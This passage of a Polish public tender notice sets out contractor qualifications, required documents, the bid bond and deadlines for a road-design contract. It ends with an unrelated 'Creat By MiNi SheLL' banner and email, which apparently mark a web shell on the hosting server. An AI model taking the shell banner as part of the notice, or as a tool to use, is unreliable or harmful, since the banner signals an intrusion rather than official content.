- KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawca spełni warunek jeżeli wykaże, że wykonał (zakończył) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, minimum 2 projekty budowlano-wykonawcze lub budowlane i wykonawcze, które dotyczyły budowy lub rozbudowy** drogi o parametrach klasy G* lub wyższej o długości co najmniej 1,0 km stanowiący jeden odcinek drogi (nie dopuszcza się sumowania odcinków składowych).<br/><br/>* – lub drogi o równoważnych parametrach w przypadku projektów realizowanych poza granicami Rzeczpospolitej Polskiej. <br/><br/>** - obejmującej co najmniej pełną wymianę konstrukcji nawierzchni jezdni wraz z infrastrukturą.<br/><br/>Za drogę zamawiający uzna drogę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2024 r., poz. 320 – tekst jednolity).<br/><br/>Zadania, które polegały na aktualizacji lub optymalizacji dokumentacji projektowej nie <br/>będą uznane jako spełniające opisane powyżej warunki.<br/><br/>Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższe warunki.<br/><br/>2. Wykonawca spełni warunek jeżeli wykaże, że dysponuje osobami, którym zostanie powierzone wykonanie niniejszego zamówienia na stanowiskach wymienionych poniżej:<br/><br/>a) projektant branży drogowej posiadający uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów i doświadczenie w opracowaniu, po uzyskaniu uprawnień, minimum dwóch projektów budowlano-wykonawczych lub budowlanych i wykonawczych, które dotyczyły budowy lub rozbudowy** drogi o parametrach klasy G* lub wyższej o długości minimum 1 km każdy (stanowiący jeden odcinek drogi) – 1 osoba,<br/><br/>b) projektant branży mostowej posiadający uprawnienia budowlane do projektowania w specjalności inżynieryjnej mostowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów i doświadczenie w opracowaniu, po uzyskaniu uprawnień, minimum dwóch projektów budowlanych i wykonawczych lub budowlano-wykonawczych, które dotyczyły budowy lub przebudowy obiektów inżynierskich w ciągu drogi o parametrach klasy G* lub wyższej – 1 osoba, <br/><br/>c) geodeta posiadający uprawnienia geodezyjne, uprawnienia zawodowe w zakresie 1 i 2 zgodne z rozdziałem 8 ustawy Prawo geodezyjne i kartograficzne oraz doświadczenie uczestniczenia w opracowaniu, po uzyskaniu uprawnień, minimum dwóch dokumentacji projektowych – 1 osoba.<br/><br/>* – lub drogi o równoważnych parametrach w przypadku projektów realizowanych poza granicami Rzeczpospolitej Polskiej. <br/>** - obejmującej co najmniej pełną wymianę konstrukcji nawierzchni jezdni wraz z infrastrukturą.<br/><br/>Za drogę zamawiający uzna drogę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2024 r., poz. 320 – tekst jednolity).<br/><br/>Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższy warunek. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamawiający, zgodnie z art. 274 ust. 1 ustawy Prawo zamówień<br/>publicznych przed wyborem najkorzystniejszej oferty, wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Prawo zamówień publicznych, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>2) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 ustawy Prawo<br/>zamówień publicznych, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>3) zamawiający zamiast podmiotowych środków dowodowych w postaci informacji z Krajowego Rejestru Karnego w zakresie:<br/>a) art. 108 ust 1 pkt 1 i 2 ustawy Pzp,<br/>b) art. 108 ust 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>żąda oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust 1 ustawy.<br/>2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast odpisu albo<br/>informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w<br/>punkcie 1 podpunkt 1) powyżej – składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub<br/>miejsce zamieszkania, potwierdzające, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>2.1. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której<br/>dokument dotyczy, nie wydaje się dokumentów, o których mowa w punkcie 2 powyżej, lub gdy dokumenty te nie odnoszą się do<br/>wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Prawo zamówień publicznych, zastępuje się je<br/>odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo<br/>osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli<br/>w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał<br/>dotyczyć, nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub<br/>miejsce zamieszkania osoby, której dokument miał dotyczyć. Przepis punktu 3 poniżej stosuje się.<br/>3. Dokumenty, o których mowa w punkcie 2 powyżej powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania warunków dotyczących zdolności techn. lub zaw. zamawiający, zgodnie z art. 274 ust. 1 ustawy Pzp przed wyborem najkorzystniejszej oferty, wezwie wyk., którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie, aktualnych na dzień złożenia podm. środków dow.:<br/><br/>a) wykazu usług wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane i powinien zawierać szczegółowe inf. i dane niezbędne do oceny warunków udziału w postępowaniu, o których mowa w sekcji 5.4.) punkcie 1 (tj. określić nazwę i rodzaj oprac. projektów, czy były to projekty bud. i wyk. lub bud.-wyk., czy dot. budowy lub rozbudowy drogi, podać klasę drogi, wskazać dł. odcinka drogi - stan. jeden odc. drogi – w przyp. wykazania projektu dotyczącego rozbudowy drogi wskazać, czy obejmował co najmniej pełną wymianę konstrukcji nawierzchni jezdni wraz z infrastrukturą) oraz załączeniem dow. określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – ośw. wyk. – wykaz usług stanowi zał.nr 4 do SWZ.<br/><br/> b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publ., a także zakresu wyk. przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wykaz osób stanowi załącznik nr 5 do SWZ i powinien zawierać szczegółowe informacje i dane niezbędne do oceny warunków udziału w postępowaniu, o których mowa w sekcji 5.4.) punkcie 2 tj.: <br/>– dla osoby wskazanej w sekcji 5.4.) punkcie 2 podpunkt a) (projektant branży drogowej) wpisać imię i nazwisko, nazwę, specjalność i zakres posiadanych uprawnień (czy bez ograniczeń), doświadczenie (określić czy były to projekty <br/> budowlane i wyk. lub bud.-wyk., czy dotyczyły budowy lub rozbudowy drogi, klasa drogi oraz wskazać dł. odcinka drogi – stan. jeden odcinek drogi, w przyp. wyk. projektów dotyczących rozbudowy drogi wskazać, czy obejmowały co najmniej pełną wymianę konstrukcji nawierzchni jezdni wraz z infrastrukturą, określić czy wyk. dośw.e zostało zdobyte po uzyskaniu upr.) oraz podać inf. o podstawie do dysp. tą osobą,<br/><br/>- dla osoby wskazanej w sekcji 5.4.) punkcie 2 podpunkt b) (projektant branży mostowej) wpisać imię i nazwisko, nazwę, specjalność i zakres posiadanych uprawnień (czy bez ograniczeń), dośw. (określić czy był to projekt bud. i wyk. lub bud.-wyk., czy dotyczył budowy lub przebudowy obiektu inżynierskiego, klasa drogi, określić czy wykazane dośw.e zostało zdobyte po uzyskaniu uprawnień) oraz podać inf. o podstawie do dysponowania tą osobą,<br/><br/>– dla osoby wskazanej w sekcji 5.4.) punkcie 2 podpunkt c) (geodeta) wpisać imię i nazwisko, nazwę i zakres posiadanych uprawnień oraz doświadczenie (określić nazwy dok.projektowych, w których opracowaniu uczestniczył geodeta, określić czy wykazane doświadczenie zostało zdobyte po uzyskaniu uprawnień) oraz podać inf. o podstawie do dysponowania tą osobą.<br/><br/>W w/w wykazie osób musi być wpisane to samo imię i nazwisko projektanta branży drogowej, co osoby zadeklarowanej w wykazie osób dla spełnienia kryterium oceny ofert przez wykonawcę w treści oferty na załączniku nr 1a do SWZ.<br/><br/>2. Jeżeli wyk. powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami, wykaz o którym mowa w punkcie 5.4 podpunkt a) SWZ dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda wniesienia wadium w wysokości 5.000,00 PLN <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu przesłanek, o których mowa w sekcji 5.2.) i art. 108 ust. 1 ustawy Prawo zamówień publicznych oraz<br/>o których mowa w sekcji IX punkt III, natomiast spełnienie warunków udziału w postępowaniu wykonawcy wykazują zgodnie<br/>z sekcją 5.4.).<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie wymienione w sekcji 5.5.) składa<br/>wraz z ofertą każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>4. Na wezwanie zamawiającego zgodnie z art. 274 ust 1 ustawy Prawo zamówień publicznych każdy z wykonawców<br/>wspólnie ubiegających się o zamówienie przedkłada również dokumenty określone w sekcjach 5.6.) i 5.7.). Dokumenty te<br/>potwierdzają brak podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu w zakresie, w którym każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>6. W przypadku, o którym mowa w punkcie 5 powyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy.<br/>7. Wykonawcy, o których mowa w punkcie 1 powyżej ponoszą solidarną odpowiedzialność za wykonanie umowy i<br/>wniesienia zabezpieczenia należytego wykonanie umowy (jeżeli wniesienie takiego zabezpieczenia jest wymagane przez<br/>zamawiającego) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany umowy zawartej z wykonawcą. Wszystkie dopuszczalne zmiany postanowień<br/>umowy oraz określenie zakresu i warunków zmian zawarte są w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy składać za pośrednictwem Platformy zakupowej: https://platformazakupowa.pl lub poprzez profil nabywcy: https://platformazakupowa.pl/pn/zdw_opole</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Treść zapyt. wraz z wyj., zmiany treści SWZ oraz inne dok. zam. bezpośr. związ. z postęp. o udziel. zam. zam. udostęp., bez ujaw. źródła zapyt. na str. inter. prowadz. postęp.: https://platformazakupowa.pl lub na prof. nab.:<br/>https://platformazakupowa.pl/pn/zdw_opole, w tym dok. dost. do pobr. pod wskaz. adr.: https://platformazakupowa.pl/transakcja/1117284.<br/>II. Wraz z form. of. sporz. w form. elektr. opatrz. kwalif. podp. elektr. lub w post. elektr. opatrz. podp. zauf. lub podp. osob. (na zał. nr 1 do SWZ), za pośred. Platf. zakup.: https://platformazakupowa.pl lub poprzez prof. nab.:<br/>https://platformazakupowa.pl/pn/zdw_opole zgod. z zasad. określ. w sekcji 3.6.) powinny być złoż.:<br/>1) wyk. os. dla spełn. kryter. oceny ofert w form. elektr. opatrz. kwalifik. podp. elektr. lub w post. elektr. opatrz. podp. zauf.<br/>lub podp. osob. – na zał. nr 1a do SWZ,<br/>2) odpis lub inf. z KRS, CEiIDG lub innego właściw. rej. celem potw. umoc. osoby działaj. w im. wyk., chyba że zamaw. może je uzysk. za pom. bezpł. i ogólnodostęp. baz danych, a wyk. wsk. dane umożliw. dostęp do tych dok. w odnie. do wyk., wyk. wspól. ubiegaj. się o zam., jak również w odnie. do podm. udostęp. zasoby. W przyp. wskaz. przez wyk. dostęp. wyżej<br/>wym. dok. pod określ. adres. inter. ogólnodostęp. i bezpł. baz danych, zam. może żądać od wyk. przedst. tłumacz. na język polski pobr. samodz. przez zam. dok.,<br/>3) pełnomoc. lub inny dok. potw. umoc. do reprezent. wyk. lub podm. udostęp. zasoby chyba, że umoc. do reprezent. wynika z dok., o których mowa w podp. 2 powyżej sporz. w form. elektr. opatrz. kwalifik. podp. elektr. lub w post. elektr. opatrz. podp. zauf. lub podp. osob.,<br/>4) form. cen. w form. elektr. opatrz. kwalifik. podp. elektr. lub w post. elektr. opatrz. podp. zauf. lub podp. osob. – na zał. nr 2 do SWZ,<br/>5) ośw. o którym mowa w art. 125 ust. 1 ustawy Pzp w form. elektr. opatrz. kwalifik. podp. elektr. lub w post. elektr. opatrz. podp. zauf. lub podp. osob. – na zał. nr 3 do SWZ,<br/>5a) wyk., w przyp. poleg. na zdoln. lub syt. podm. udostęp. zasoby, przedst., wraz z ośw. o którym mowa w podp. 4 powyżej, także ośw. podm. udostęp. zasoby, potwierdz. brak podstaw wykl. tego podm. oraz odp. speł. war. udziału w postęp. lub kryt. selekcji, w zakr., w jakim wyk. pow. się na jego zasoby – na zał. nr 3a do SWZ.<br/>Ośw. podm. udostęp. zasoby w zakr. w jakim potwierdz. okol., o których mowa w treści art. 57 ustawy Prawo zam. publ. muszą mieć form. dok. elektr., podpis. kwalifik. podp. elektr. lub w post. elektr. opatrz. podp. zauf. lub podp. osob. przez<br/>każdy z tych podm. zgod. z zasad. określ. w sekcji 3.6.),<br/>5b) w przyp. wyk. wspól. ubieg. się o zam. ośw. o którym mowa w art. 125 ust. 1 ustawy Prawo zam. publ. składa każdy z nich zgod. z zasad. określ. w sekcji 3.6.),<br/>6) pełnomoc. potw. umoc. do reprezent. wszystkich wyk. wspól. ubieg. się o udziel. zam. sporz. w form. elektr. i opatrz. kwalifik. podp. elektr. lub w post. elektr. opatrz. podp. zauf. lub podp. osob.,<br/>7) zob. podm. udostęp. zasoby, o których mowa w punkcie 4.5 podp. 2 SWZ sporz. w form. elektr. opatrz. kwalif. podp. elektr. lub w post. elektr. opatrz. podp. zauf. lub podp. osob. – wzór zob. stanowi zał. nr 4 do SWZ,<br/>8) oryg. gwar. lub poręcz., jeżeli wad. wnosz. jest w innej form. niż pieniądz przekaz. się w post. elektr.,<br/>9) ośw. o którym mowa w art. 117 ust 4 ustawy Pzp lub w sekcji 6.6.) punkt 6 – zgod. z zał. nr 5 do SWZ (dot. tylko wyk. wspól. ubieg. się o udziel. zam.).<br/>III. Z postęp. o udziel. zam. publ. wykl. się wyk. również zgod. z art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczegól. rozw. w zakr. przeciwdział. wspier. agresji na Ukrainę oraz służ. ochr. bezpiecz. narod. (punkt 4.8. podp. 6 SWZ).<br/>IV. Dot. sekcji 4.2.10) Okr. obow. zam. wyn. 48 m., term. złoż. kompl. wnio. o ZRID wraz z wymag. mater. wyn. do 25 m. od<br/>daty podp. um., term. uzysk. dec. ZRID wyn. do 30 m. od daty podp. um., term. dostar. proj. wyk. z częścią koszt. wyn. do<br/>34m. od podp. um. Kolejne term. określ. są w punkcie 12 SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com